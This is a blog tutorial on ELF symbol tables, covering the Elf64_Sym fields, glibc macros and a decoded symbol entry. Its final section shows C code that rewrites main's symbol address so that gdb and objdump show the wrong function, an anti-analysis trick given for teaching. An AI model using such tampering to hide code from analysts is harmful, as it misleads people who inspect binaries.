<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj4UdsvT6Il1qpx-LdgsDUPx-T-QB7twj73r7lhg3bR_s7h85mNhJoWbaLTmQNdGCP-kRKOT7yMiedTT0pf7IDpo0ZxInjpOyWouxpkfdSBZv7PcE71vUl5ITcQbDgPpIATt8CQLyuRhjI/s1600/linking+and+compiling+%25282%2529.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="770" data-original-width="1600" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj4UdsvT6Il1qpx-LdgsDUPx-T-QB7twj73r7lhg3bR_s7h85mNhJoWbaLTmQNdGCP-kRKOT7yMiedTT0pf7IDpo0ZxInjpOyWouxpkfdSBZv7PcE71vUl5ITcQbDgPpIATt8CQLyuRhjI/s1600/linking+and+compiling+%25282%2529.png" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><span style="font-size: small;"><i>basic compile and link work flow with gcc. To get myself out of trouble I've included a relocate() fake function here to say "when this gets relocated it produces this address for the objects mapping in the final ELF file"</i></span></td></tr>
</tbody></table>
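<br />
The "array of arrays" picture can be boiled down to a few lines of C. This is a hypothetical toy model, not how ld is implemented. It assumes each object contributes a .text chunk of a known size, the chunks are laid out back to back from a base address, and alignment and padding are ignored:<br />

```c
#include <stddef.h>
#include <stdint.h>

/* Hypothetical toy model of the first "sweep": each input object
 * contributes a .text chunk, and the chunks are placed back to back. */
struct toy_object {
    const char *name;
    uint64_t    text_size;   /* size of this object's .text chunk */
};

/* Final address of a symbol defined at sym_offset inside object idx's
 * .text, once every object has been laid out starting at base.
 * Alignment and padding are ignored in this sketch. */
static uint64_t relocated_address(const struct toy_object *objs, size_t idx,
                                  uint64_t base, uint64_t sym_offset)
{
    uint64_t chunk_start = base;
    for (size_t i = 0; i < idx; i++)
        chunk_start += objs[i].text_size;  /* skip the chunks placed before */
    return chunk_start + sym_offset;
}
```

With main.o (0x40 bytes) and lib.o (0x20 bytes) placed at 0x400000, a function at offset 0x8 in lib.o lands at 0x400048.<br />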
<br />
<br />
So this is essentially the workflow of the compiler at a very high level. What should focus your investigation from here is what those deeper details and hex obscurities are that achieve this aggregated behavior. <i>Why does this picture appear to work so smoothly? Well, it must be hiding its hideous details away! </i><br />
<br /></div>
<div>
In closing, what you need to imagine here is that for each attribute there must be some bits and bytes that allow quick determination of the settings for each attribute as well as how it managed to end up in its place in the final Elf object file. In the next section we cover how this format works and what allows it to offer this amazing functionality <i>and we are going to show how horrible it can get when this breaks!</i></div>
<div>
<br /></div>
<b>Notes:</b><br />
<div>
<ol style="text-align: left;">
<li><i>This has nothing to do with development and more to do with the burden of processing language as a whole. </i></li>
<li><i>(borrowing some terms that foreshadow your journey into the world of compilers should you get crazy enough for that ride) </i></li>
</ol>
</div>
<h2 style="text-align: left;">
Symbol Table and friends (.symtab, .dynsym)</h2>
<div>
So the Elf format needs a clever, compact way to bundle the plethora of things that determine the type and scope/binding of a symbol, as well as what must be done to resolve it. The symbol table is meant to show us the symbols we want to relocate.</div>
<div>
<br /></div>
<div>
I should mention that there are two symbol tables, namely the main symbol table (<i><span style="font-family: "courier new" , "courier" , monospace;">.symtab</span> in the section headers</i>) and <span style="font-family: "courier new" , "courier" , monospace;">.dynsym</span>, the dynamic symbol table. The dynamic symbol table is a smaller subset of the entries in the main symbol table, relevant only to the dynamic linker. It follows exactly the same encoding and format as the main one,<i> but I won't discuss it here; I'll give it a full swing in a later post about dynamic linking instead.</i></div>
<div>
<br /></div>
<div>
Before we dig into things, here's a cheat sheet showing you the scope and break down of the Symbol Table:</div>
<div>
<br /></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjltCGrtfMVCeTERCxDGTv7hB2SgjXoxjRNUcI0bf2Ob-XXJCpAX5r7Eff4BGfyqN752lkUvG6QmZOW2-6ISMhyphenhypheniwxKGA_8OOcU1jBQeCfUI5Hx9iLu0Fp_CG6q50IzQeA6jZGnJvTFD4Q/s1600/Symbol+Table+%25281%2529.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="884" data-original-width="1600" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjltCGrtfMVCeTERCxDGTv7hB2SgjXoxjRNUcI0bf2Ob-XXJCpAX5r7Eff4BGfyqN752lkUvG6QmZOW2-6ISMhyphenhypheniwxKGA_8OOcU1jBQeCfUI5Hx9iLu0Fp_CG6q50IzQeA6jZGnJvTFD4Q/s1600/Symbol+Table+%25281%2529.png" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><span style="font-size: small;"><i>Symbol Table Entry Field Cheat Sheet</i></span></td></tr>
</tbody></table>
<br />
<br />
<br />
<br />
The following <span style="font-family: "courier new" , "courier" , monospace;">struct</span> is used in libelf, it should expose some important information about how Symbol Table Entries work (extract from <span style="font-family: "courier new" , "courier" , monospace;"><b>glibc/elf/elf.h:529-536</b></span>):<br />
<br />
<span style="font-family: "courier new" , "courier" , monospace;"><b>typedef struct</b></span><br />
<span style="font-family: "courier new" , "courier" , monospace;">{</span><br />
<br />
<span style="font-family: "courier new" , "courier" , monospace;"> <b>Elf64_Word</b><span style="white-space: pre;"> </span>st_name; /* (4 bytes) Symbol name */</span><br />
<span style="font-family: "courier new" , "courier" , monospace;"> <b>unsigned char</b> st_info; /* (1 byte) Symbol type and binding */</span><br />
<span style="font-family: "courier new" , "courier" , monospace;"> <b>unsigned char</b> st_other; /* (1 byte) Symbol visibility */</span><br />
<span style="font-family: "courier new" , "courier" , monospace;"> <b>Elf64_Section</b> st_shndx; /* (2 bytes) Section index */</span><span style="font-family: "courier new" , "courier" , monospace;"> </span><br />
<span style="font-family: "courier new" , "courier" , monospace;"> <b>Elf64_Addr</b><span style="white-space: pre;"> </span>st_value; /* (8 bytes) Symbol value */</span><br />
<span style="font-family: "courier new" , "courier" , monospace;"> <b>Elf64_Xword</b><span style="white-space: pre;"> </span>st_size; /* (8 bytes) Symbol size */</span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><br /></span>
<span style="font-family: "courier new" , "courier" , monospace;">} <b>Elf64_Sym</b>;</span><br />
<div>
<br /></div>
I've added the type size so you don't need to scratch through the <span style="font-family: "courier new" , "courier" , monospace;">typedefs</span> to figure this out, you're welcome!<br />
<br />
<i>So the way I like to think about this is:</i> because of the order and sizes of these fields, we can quickly notice that the first 8 bytes (<span style="font-family: "courier new" , "courier" , monospace;">st_name, st_info, st_other, st_shndx</span>) act as a kind of <i>metadata header</i>. They determine the attributes of the symbol. Everything after that describes the actual value the symbol holds (<i>its address, offset etc., which depends somewhat on the values in the first 8 bytes</i>) and its size.<br />
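<br />
Here's a quick C sketch that checks the layout claims above at compile time. The struct is a local copy of Elf64_Sym, with the glibc typedefs replaced by their fixed-width equivalents (worth double checking against your own elf.h). sym_name is a hypothetical helper showing that st_name is just an offset into the string table:<br />

```c
#include <assert.h>   /* static_assert (C11) */
#include <stddef.h>
#include <stdint.h>

/* Local copy of Elf64_Sym with fixed-width types in place of glibc's typedefs. */
typedef struct {
    uint32_t      st_name;   /* Elf64_Word: offset into the string table */
    unsigned char st_info;   /* type and binding */
    unsigned char st_other;  /* visibility */
    uint16_t      st_shndx;  /* Elf64_Section: section index */
    uint64_t      st_value;  /* Elf64_Addr: symbol value */
    uint64_t      st_size;   /* Elf64_Xword: symbol size */
} Elf64_Sym;

/* The first 8 bytes form the "metadata header"; value and size follow. */
static_assert(offsetof(Elf64_Sym, st_shndx) == 6, "st_shndx at byte 6");
static_assert(offsetof(Elf64_Sym, st_value) == 8, "st_value at byte 8");
static_assert(sizeof(Elf64_Sym) == 24, "one symbol entry is 24 bytes");

/* Hypothetical helper: st_name is a byte offset into .strtab, so the
 * name is just the NUL-terminated string starting there (offset 0
 * gives the empty string, i.e. an unnamed symbol). */
static const char *sym_name(const char *strtab, const Elf64_Sym *sym)
{
    return strtab + sym->st_name;
}
```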
<br />
Okay so what do these fields mean?<br />
<ul style="text-align: left;">
<li><b><span style="font-family: "courier new" , "courier" , monospace;">st_name</span></b> - the offset into the <span style="font-family: "courier new" , "courier" , monospace;">.strtab</span> of the first byte of the symbol's null-terminated name. Not all symbols have names; when they don't, this field holds <span style="font-family: "courier new" , "courier" , monospace;">0</span>.</li>
<li><span style="font-family: "courier new" , "courier" , monospace;"><b>st_info</b></span> - a bit field that determines a few attributes of the symbol. Namely, it holds the "scope" (binding) and the type of thing in the C program it is meant to aid relocation for, indicating whether it is a function, a variable or something else. Like pretty much every bit field, in true C style, it gets passed through a macro. The macro applies bitmasks and shifts to isolate the bits dedicated to each attribute. Here's the code for processing this field on 64-bit architectures (extract from <b><span style="font-family: "courier new" , "courier" , monospace;">glibc/elf/elf.h:570-579</span></b>):</li>
</ul>
<div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;">/* How to extract and insert information held in the st_info field. */</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;">#define <b>ELF32_ST_BIND</b>(val)\</span><br />
<span style="font-family: "courier new" , "courier" , monospace;"> (((unsigned char) (val)) >> 4)</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;">#define <b>ELF32_ST_TYPE</b>(val)\</span><br />
<span style="font-family: "courier new" , "courier" , monospace;"> ((val) & 0xf)</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;">#define <b>ELF32_ST_INFO</b>(bind, type) \</span><br />
<span style="font-family: "courier new" , "courier" , monospace;"> (((bind) << 4) + ((type) & 0xf))</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"> </span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;">/* Both Elf32_Sym and Elf64_Sym use the same one-byte st_info field. */</span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><br /></span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;">#define <b>ELF64_ST_BIND</b>(val) ELF32_ST_BIND (val)</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;">#define <b>ELF64_ST_TYPE</b>(val) ELF32_ST_TYPE (val)</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;">#define <b>ELF64_ST_INFO</b>(bind, type) ELF32_ST_INFO ((bind), (type))</span><span style="font-family: "courier new" , "courier" , monospace;"> </span><br />
<br />
<ul style="text-align: left;">
<li><span style="font-family: "courier new" , "courier" , monospace;"><b>st_other</b></span><span style="font-family: inherit;"> - A bit field whose low two bits hold the symbol's visibility, an attribute that controls whether (and how) the symbol can be referenced from outside the component that defines it. Here's the macro glibc uses to pull out the visibility value:</span></li>
</ul>
<div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;">/* How to extract and insert information held in the st_other field. */</span></div>
<div>
<br /></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;">#define <b>ELF32_ST_VISIBILITY</b>(o) ((o) & 0x03)</span></div>
<div>
<br /></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;">/* For ELF64 the definitions are the same. */</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;">#define <b>ELF64_ST_VISIBILITY</b>(o) ELF32_ST_VISIBILITY (o)</span></div>
</div>
</div>
</div>
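To make the bit twiddling concrete, here is a minimal sketch that packs and unpacks st_info with the macros quoted above. It assumes a Linux system whose elf.h (shipped with glibc) defines these macros along with the STB_* and STT_* constants. The helper names split_st_info and make_st_info are hypothetical and not part of glibc.

```c
#include <elf.h>

/* Split a one-byte st_info value into its binding (high nibble) and
 * type (low nibble) using the glibc macros quoted above. */
void split_st_info(unsigned char info, unsigned *bind, unsigned *type)
{
    *bind = ELF64_ST_BIND(info);   /* ((unsigned char) info) >> 4 */
    *type = ELF64_ST_TYPE(info);   /* info & 0xf                  */
}

/* Pack a binding and a type back into one st_info byte. */
unsigned char make_st_info(unsigned bind, unsigned type)
{
    return (unsigned char) ELF64_ST_INFO(bind, type);
}
```

For example, make_st_info(STB_GLOBAL, STT_FUNC) yields 0x12, which is what a typical global function symbol carries. Splitting 0x03 yields STB_LOCAL and STT_SECTION, which matches the value of the symbol examined later in this post.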
<div>
<br /></div>
<div>
Visibility types for symbols include (<i>also available from the diagram above</i>):</div>
<br />
<ul style="text-align: left;"><ul>
<li><span style="font-family: "courier new" , "courier" , monospace;"><b>STV_DEFAULT 0x00</b></span> - the default rules apply: visibility follows the symbol's binding, so global and weak symbols are visible to other components (and can be preempted by definitions there), while local symbols are not</li>
<li><span style="font-family: "courier new" , "courier" , monospace;"><b>STV_INTERNAL 0x01</b></span> - a processor-specific class of hidden symbol; processor supplements may define it to restrict hidden symbols further</li>
<li><span style="font-family: "courier new" , "courier" , monospace;"><b>STV_HIDDEN 0x02</b></span> - the symbol is not visible to, and cannot be referenced from, other components</li>
<li><span style="font-family: "courier new" , "courier" , monospace;"><b>STV_PROTECTED 0x03</b> </span>- Documentation refers to this as a protected symbol. I <a href="https://www.airs.com/blog/archives/307">believe</a> the only difference between this and a normal <span style="font-family: "courier new" , "courier" , monospace;">STV_DEFAULT</span> symbol is that it can't be overridden when referenced from within its own shared library. </li>
</ul>
</ul>
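The visibility list above maps directly onto a small lookup. Here is a minimal sketch, again assuming glibc's elf.h for ELF64_ST_VISIBILITY and the STV_* constants. The function name visibility_name is hypothetical. Note that only the low two bits of st_other matter, so any higher bits are ignored.

```c
#include <elf.h>

/* Return the STV_* name encoded in the low two bits of st_other. */
const char *visibility_name(unsigned char st_other)
{
    switch (ELF64_ST_VISIBILITY(st_other)) {  /* (o) & 0x03 */
    case STV_DEFAULT:   return "STV_DEFAULT";
    case STV_INTERNAL:  return "STV_INTERNAL";
    case STV_HIDDEN:    return "STV_HIDDEN";
    case STV_PROTECTED: return "STV_PROTECTED";
    }
    return "unreachable";  /* the mask can only produce 0..3 */
}
```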
<ul style="text-align: left;">
<li><span style="font-family: "courier new" , "courier" , monospace; font-weight: bold;">st_shndx</span><span style="font-family: inherit;"> - The index of the section this symbol is associated with. Symbols are tied to sections this way because almost everything defined </span><i style="font-family: inherit;">as a symbol</i><span style="font-family: inherit;"> lives in some section -</span><span style="font-family: inherit; font-style: italic;"> for instance, where would a variable's value be defined? Probably in one of the </span><span style="font-family: "courier new" , "courier" , monospace; font-style: italic;">.data</span><i style="font-family: inherit;">-esque sections, no? </i><span style="font-family: inherit;">A few reserved index values don't name a real section but instead say something special about the symbol (for example </span><span style="font-family: "courier new" , "courier" , monospace;">SHN_UNDEF</span><span style="font-family: inherit;">, </span><span style="font-family: "courier new" , "courier" , monospace;">SHN_ABS</span><span style="font-family: inherit;"> and </span><span style="font-family: "courier new" , "courier" , monospace;">SHN_COMMON</span><span style="font-family: inherit;">); check out </span><span style="font-family: "courier new" , "courier" , monospace;">glibc/elf.h:414+</span><span style="font-family: inherit;"> for the full range of these values.</span></li>
</ul>
<ul style="text-align: left;">
<li><b><span style="font-family: "courier new" , "courier" , monospace;">st_value</span></b> - The value of the symbol. Its interpretation depends on the kind of file and on the symbol's section index: </li>
<ul>
<li>In executable files and shared objects, this field holds the virtual address of the symbol's definition. </li>
<li>In relocatable files, it usually holds the offset of the symbol's definition from the start of the section given by <span style="font-family: "courier new" , "courier" , monospace;">st_shndx</span>.</li>
<li>For symbols whose <span style="font-family: "courier new" , "courier" , monospace;">st_shndx</span> is <span style="font-family: "courier new" , "courier" , monospace;">SHN_COMMON</span>, <span style="font-family: "courier new" , "courier" , monospace;">st_value</span> holds alignment constraints for the symbol. </li>
</ul>
<li><span style="font-family: "courier new" , "courier" , monospace;"><b>st_size</b></span> - The size of the symbol, meaning how many bytes the thing it represents occupies. This again depends on the symbol type: <i>for the most part it is either the size of a variable's data or the size of a function's code. </i></li>
</ul>
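Putting the six fields together gives the 24-byte record that sits on disk. The sketch below assumes glibc's elf.h and a C11 compiler for _Static_assert. It spells out the layout and lets the compiler check it. The helper symbol_count is hypothetical. It shows how a table's entry count follows from its section header's sh_size and sh_entsize.

```c
#include <elf.h>
#include <stddef.h>

/* Byte layout of one Elf64_Sym entry as declared in elf.h:
 *   offset 0   st_name   4 bytes  index into the linked string table
 *   offset 4   st_info   1 byte   binding << 4 | type
 *   offset 5   st_other  1 byte   visibility in the low two bits
 *   offset 6   st_shndx  2 bytes  associated section index
 *   offset 8   st_value  8 bytes  address or offset
 *   offset 16  st_size   8 bytes  size in bytes
 * The compiler verifies these claims at build time. */
_Static_assert(offsetof(Elf64_Sym, st_name)  == 0,  "st_name offset");
_Static_assert(offsetof(Elf64_Sym, st_info)  == 4,  "st_info offset");
_Static_assert(offsetof(Elf64_Sym, st_other) == 5,  "st_other offset");
_Static_assert(offsetof(Elf64_Sym, st_shndx) == 6,  "st_shndx offset");
_Static_assert(offsetof(Elf64_Sym, st_value) == 8,  "st_value offset");
_Static_assert(offsetof(Elf64_Sym, st_size)  == 16, "st_size offset");
_Static_assert(sizeof(Elf64_Sym) == 24, "one entry is 24 bytes");

/* Number of entries in a symbol table section (entry 0 is the null
 * symbol); sh_entsize is normally sizeof(Elf64_Sym). */
size_t symbol_count(Elf64_Xword sh_size, Elf64_Xword sh_entsize)
{
    return sh_entsize ? (size_t) (sh_size / sh_entsize) : 0;
}
```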
<br />
Let's take a look at how this information is represented on disk in raw binary:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgdvUI6-73TtY2n86sNrc6i4leL8_0NcFmuT6IHOizBRXX48Wbott6dLlZXClXYFzV2TsH_6pelePxKnY4rX99AuCeaEASwnfJbxksyc2ubtbTMSMf-LAUHY1WqVXejCUOqHfLT5RBRnlU/s1600/Symbol+Header+Table+%25283%2529.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="242" data-original-width="1054" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgdvUI6-73TtY2n86sNrc6i4leL8_0NcFmuT6IHOizBRXX48Wbott6dLlZXClXYFzV2TsH_6pelePxKnY4rX99AuCeaEASwnfJbxksyc2ubtbTMSMf-LAUHY1WqVXejCUOqHfLT5RBRnlU/s1600/Symbol+Header+Table+%25283%2529.png" /></a></div>
<br />
<div>
<br /></div>
I've skipped the first record because it's always going to be a null symbol (<i>the same goes for <span style="font-family: "courier new" , "courier" , monospace;">.dynsym</span></i>). For the symbol highlighted here we can see the following:<br />
<br />
<ul style="text-align: left;">
<li><span style="font-family: "courier new" , "courier" , monospace;"><b>st_value</b></span> of the symbol is set to <span style="font-family: "courier new" , "courier" , monospace;">0x400238</span>, which means it will appear at this virtual address.</li>
<li><span style="font-family: "courier new" , "courier" , monospace;"><b>st_size</b></span> is set to <span style="font-family: "courier new" , "courier" , monospace;">0</span>, which means no size is associated with the symbol. That's normal for a section symbol, which marks a location rather than describing a sized object such as a variable or a function.</li>
<li><span style="font-family: "courier new" , "courier" , monospace;"><b>st_info</b></span> is set to <span style="font-family: "courier new" , "courier" , monospace;">0x03</span>. The low nibble is 3, so the symbol type is <span style="font-family: "courier new" , "courier" , monospace;">SECTION</span>, meaning it's a symbol associated with a section. The high nibble is 0, so the binding is <span style="font-family: "courier new" , "courier" , monospace;">LOCAL</span>, meaning the symbol isn't visible outside the object file that defines it.</li>
<li><span style="font-family: "courier new" , "courier" , monospace;"><b>st_other</b></span> is set to <span style="font-family: "courier new" , "courier" , monospace;">0x00</span>, which means its visibility is <span style="font-family: "courier new" , "courier" , monospace;">STV_DEFAULT</span>.</li>
<li><span style="font-family: "courier new" , "courier" , monospace;"><b>st_name</b></span> is set to <span style="font-family: "courier new" , "courier" , monospace;">0x000000</span>, which means the symbol has no name of its own, because offset 0 in a string table always holds an empty string.</li>
<li><span style="font-family: "courier new" , "courier" , monospace;"><b>st_shndx</b></span> is set to <span style="font-family: "courier new" , "courier" , monospace;">0x01</span>, which means it is associated with the section at index 1 in the section header table. If you haven't guessed, this is the<span style="font-family: "courier new" , "courier" , monospace;"> .interp</span> section. </li>
</ul>
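The same decoding can be done in code. The 24 bytes below are rebuilt from the field values listed above, assuming little-endian x86-64. They are not copied from the screenshot. parse_symbol is a hypothetical helper. It uses memcpy rather than a pointer cast, which avoids alignment and aliasing problems. It also assumes a little-endian host, so no byte swapping is needed.

```c
#include <elf.h>
#include <string.h>

/* The entry discussed above, reconstructed from its decoded fields. */
const unsigned char raw_entry[24] = {
    0x00, 0x00, 0x00, 0x00,                         /* st_name  = 0        */
    0x03,                                           /* st_info  = 0x03     */
    0x00,                                           /* st_other = 0x00     */
    0x01, 0x00,                                     /* st_shndx = 1        */
    0x38, 0x02, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, /* st_value = 0x400238 */
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00  /* st_size  = 0        */
};

/* Copy raw file bytes into an Elf64_Sym (little-endian host assumed). */
Elf64_Sym parse_symbol(const unsigned char *bytes)
{
    Elf64_Sym sym;
    memcpy(&sym, bytes, sizeof sym);
    return sym;
}
```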
<div>
<i>I took the first non-null symbol entry and expanded on it, but there are plenty of more elaborate examples to draw on, so make sure to pop open hexdump and reverse engineer some of these structures yourself ;)</i><br />
<br />
We are not going to cover relocations just yet; I thought the post would get too lengthy and bloated. For now we are going to treat the symbols as a piece of metadata on their own and leave how the dynamic linker makes use of them for later.<br />
<br /></div>
<div>
That's pretty much it as far as the symbol table goes; let's see if we can pull off some tricks!</div>
<h2 style="text-align: left;">
Elf Symbol Sorcery</h2>
<div>
"Signs and symbols rule the world, not words nor laws" - Confucius<br />
<br />
So we know that some programs rely on symbol information; these are things like <span style="font-family: "courier new" , "courier" , monospace;">objdump</span> and <span style="font-family: "courier new" , "courier" , monospace;">gdb</span>. What we're going to do is replace a symbol for a function with another one, and then see what <span style="font-family: "courier new" , "courier" , monospace;">objdump</span> and <span style="font-family: "courier new" , "courier" , monospace;">gdb</span> make of this.<br />
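Tools like these resolve a name such as main by searching .symtab and reading the names from the string table that the section's sh_link points to. Here is a rough sketch of that lookup, assuming Linux, glibc's elf.h and a 64-bit ELF file. The function find_symbol_value is hypothetical and is not how objdump or gdb are actually implemented. It checks the header but does not validate every offset.

```c
#include <elf.h>
#include <fcntl.h>
#include <string.h>
#include <sys/mman.h>
#include <sys/stat.h>
#include <unistd.h>

/* Look up `name` in the .symtab of a 64-bit ELF file and store its
 * st_value in *out. Returns 0 on success, -1 if missing or on error. */
int find_symbol_value(const char *path, const char *name, Elf64_Addr *out)
{
    int fd = open(path, O_RDONLY);
    if (fd < 0)
        return -1;
    struct stat st;
    if (fstat(fd, &st) < 0 || (size_t) st.st_size < sizeof(Elf64_Ehdr)) {
        close(fd);
        return -1;
    }
    size_t len = (size_t) st.st_size;
    unsigned char *img = mmap(NULL, len, PROT_READ, MAP_PRIVATE, fd, 0);
    close(fd);                      /* the mapping outlives the descriptor */
    if (img == MAP_FAILED)
        return -1;

    const Elf64_Ehdr *eh = (const Elf64_Ehdr *) img;
    int ok = memcmp(eh->e_ident, ELFMAG, SELFMAG) == 0
          && eh->e_ident[EI_CLASS] == ELFCLASS64
          && eh->e_shoff + (Elf64_Off) eh->e_shnum * sizeof(Elf64_Shdr) <= len;

    int rc = -1;
    for (int i = 0; ok && rc != 0 && i < eh->e_shnum; i++) {
        const Elf64_Shdr *shdrs = (const Elf64_Shdr *) (img + eh->e_shoff);
        const Elf64_Shdr *sh = &shdrs[i];
        if (sh->sh_type != SHT_SYMTAB)
            continue;
        /* sh_link is the index of the string table holding the names. */
        const char *names = (const char *) (img + shdrs[sh->sh_link].sh_offset);
        const Elf64_Sym *syms = (const Elf64_Sym *) (img + sh->sh_offset);
        size_t count = sh->sh_size / sizeof(Elf64_Sym);
        for (size_t j = 1; j < count; j++) {     /* skip the null symbol */
            if (strcmp(names + syms[j].st_name, name) == 0) {
                *out = syms[j].st_value;
                rc = 0;
                break;
            }
        }
    }
    munmap(img, len);
    return rc;
}
```

Calling find_symbol_value("never_call.elf", "main", &addr) would return whatever address the symbol table claims for main. That is exactly the value the trick below tampers with.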
<br />
So this is me overwriting the address of the <span style="font-family: "courier new" , "courier" , monospace;">main</span> function in the symbol table with the address of <span style="font-family: "courier new" , "courier" , monospace;">never_call</span>:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEigCcZl6rrkcJZYeiFMqaXC4bkaca_zo2cuP0wgo67obMULxTejIPvLOeBUBgvEHodTORW6dp-RevJz5QEAlHdFz8Zgcs1ig-zggpZI8_PrwaPw1S96dBtZrFh1mOZ3PWoKhk6Pgav9hQY/s1600/ELfSymbolSorcery.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="405" data-original-width="1263" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEigCcZl6rrkcJZYeiFMqaXC4bkaca_zo2cuP0wgo67obMULxTejIPvLOeBUBgvEHodTORW6dp-RevJz5QEAlHdFz8Zgcs1ig-zggpZI8_PrwaPw1S96dBtZrFh1mOZ3PWoKhk6Pgav9hQY/s1600/ELfSymbolSorcery.png" /></a></div>
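The patch in the screenshot was done by hand in a hex editor. A rough programmatic equivalent, sketched under the assumption of a 64-bit ELF file loaded whole into memory, might look like the following. The helpers load_file, lookup_sym and redirect_symbol are hypothetical. Bounds checks are omitted for brevity. Only st_value is copied, which mirrors the address swap described above, and no code bytes are touched.

```c
#include <elf.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Read a whole file into a malloc'd buffer; returns NULL on error. */
unsigned char *load_file(const char *path, size_t *len)
{
    FILE *f = fopen(path, "rb");
    if (f == NULL)
        return NULL;
    unsigned char *buf = NULL;
    long size = -1;
    if (fseek(f, 0, SEEK_END) == 0 && (size = ftell(f)) > 0
        && fseek(f, 0, SEEK_SET) == 0) {
        buf = malloc((size_t) size);
        if (buf != NULL && fread(buf, 1, (size_t) size, f) != (size_t) size) {
            free(buf);
            buf = NULL;
        }
    }
    fclose(f);
    if (buf != NULL)
        *len = (size_t) size;
    return buf;
}

/* Find a named entry in the image's .symtab (no bounds checks). */
Elf64_Sym *lookup_sym(unsigned char *img, const char *name)
{
    Elf64_Ehdr *eh = (Elf64_Ehdr *) img;
    Elf64_Shdr *sh = (Elf64_Shdr *) (img + eh->e_shoff);
    for (int i = 0; i < eh->e_shnum; i++) {
        if (sh[i].sh_type != SHT_SYMTAB)
            continue;
        Elf64_Sym *syms = (Elf64_Sym *) (img + sh[i].sh_offset);
        const char *names = (const char *) (img + sh[sh[i].sh_link].sh_offset);
        size_t count = sh[i].sh_size / sizeof(Elf64_Sym);
        for (size_t j = 1; j < count; j++)
            if (strcmp(names + syms[j].st_name, name) == 0)
                return &syms[j];
    }
    return NULL;
}

/* Make `target` (e.g. "main") claim the address of `source`
 * (e.g. "never_call"). Returns 0 on success, -1 if a name is missing. */
int redirect_symbol(unsigned char *img, const char *target, const char *source)
{
    Elf64_Sym *t = lookup_sym(img, target);
    Elf64_Sym *s = lookup_sym(img, source);
    if (t == NULL || s == NULL)
        return -1;
    t->st_value = s->st_value;
    return 0;
}
```

Writing the patched buffer back out to a new file with fwrite gives you a binary to feed to objdump and gdb.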
<br />
<br />
Just in case you're curious, yes, the binary still runs exactly as intended; <span style="font-family: "courier new" , "courier" , monospace;">never_call() </span>is, uhm, never called. But something interesting happens when we disassemble <span style="font-family: "courier new" , "courier" , monospace;">main</span> in gdb:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiLQwtlZh-4yxMv4e-58lKcUXC-oyT7n_6i8rGuy51Z5Ad70B8kLmvfTwbvUwarbaz6IfF2X5h7H6BpmjGhxMxBzdYnE5UUcyATZUnIkHmNFPdv_c6cQawigL8jtuIEJL2VeM6uJYFk6CI/s1600/gdb_wrong_main.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="166" data-original-width="1300" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiLQwtlZh-4yxMv4e-58lKcUXC-oyT7n_6i8rGuy51Z5Ad70B8kLmvfTwbvUwarbaz6IfF2X5h7H6BpmjGhxMxBzdYnE5UUcyATZUnIkHmNFPdv_c6cQawigL8jtuIEJL2VeM6uJYFk6CI/s1600/gdb_wrong_main.png" /></a></div>
<br />
Huh? I ask it to disassemble <span style="font-family: "courier new" , "courier" , monospace;">main</span> and it gives me the code for <span style="font-family: "courier new" , "courier" , monospace;">never_call</span>? I never called for that! (<i>I'm milking this too hard, aren't I? hehe</i>). Anyway, <span style="font-family: "courier new" , "courier" , monospace;">gdb</span> fell victim to that old symbol magic!<br />
<br />
We can also see that if we ask <span style="font-family: "courier new" , "courier" , monospace;">objdump</span> about the <span style="font-family: "courier new" , "courier" , monospace;">main</span> function, it doesn't find any code for it (<i>if you run this grep on an unedited <span style="font-family: "courier new" , "courier" , monospace;">never_call.elf</span> it will of course show the <span style="font-family: "courier new" , "courier" , monospace;">main()</span> function; here it only shows the stub code for <span style="font-family: "courier new" , "courier" , monospace;">__libc_start_main</span>, which eventually calls main itself but is a fundamentally different function.</i>):<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
